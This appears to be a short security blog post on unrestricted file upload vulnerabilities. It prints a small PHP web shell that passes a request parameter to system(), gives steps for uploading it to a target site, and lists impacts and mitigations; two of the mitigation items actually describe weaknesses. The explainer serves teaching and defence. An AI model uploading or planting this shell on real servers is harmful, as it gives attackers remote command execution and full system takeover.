Description:
File upload functions are a favorite target for hacker, because they require your site to take a large chunk of data and write it to disk. This gives attackers the opportunity to smuggle malicious scripts onto your server. If they can subsequently find a way to execute those scripts, they can compromise your entire system.
File upload vulnerability is a common security issue found in web applications. Whenever the web server accepts a file without validating it or keeping any restriction, it is considered as an unrestricted file upload.
In many web servers, the vulnerability depends entirely on its purpose, allowing a remote attacker to upload a file with malicious content. This might end up in the execution of unrestricted code in the server. File upload vulnerability can be exploited in many ways, including the usage of specially crafted multipart form-data POST requests with particular filename or mime type.
The consequences include whole system acquisition, an overloaded file system or database, diverting attacks to back end systems, and simple defamation.
php malicious script:
<?php
if(iiset($_REQUEST[‘cmd’])) {
$cmd = ($_REQUEST[‘cmd’]);
system($cmd);
} else {
echo “what is your idea ?”;
}
?>
### save as hack.php
Steps to reproduce:
step 1: Select the target having file upload functionality.
step 2: Create a malicious file hack.php and upload the file
step 3: If the file is uploaded successfully then there is a file uploaded vulnerability.
Impact of file upload vulnerability:
Takeover of the victim’s entire system through a server-side attack.
Files are injected through the malicious paths. So, existing critical files can be overwritten as the .htaccess file can be embedded to run specific scripts.
Inject phishing pages to discredit the web application.
File uploads may expose critical internal information in error messages such as server-internal paths.
Mitigation:
Firstly uploaded files do not get renamed as part of the upload process. The file name appears in the URL of the profile image when it is published.
Secondly, file-type checking is done in JavaScript.
Allow only certain file extension
Set maximum file size and name length
Allow only authorized users
Make sure the fetched file from the web is an expected one
Keep your website updated
Name the files randomly or use a hash instead of user input
Block uploads from bots and scripts using captcha.
Never display the path of the uploaded file.
for more Blog articles and Training Sessions click Here
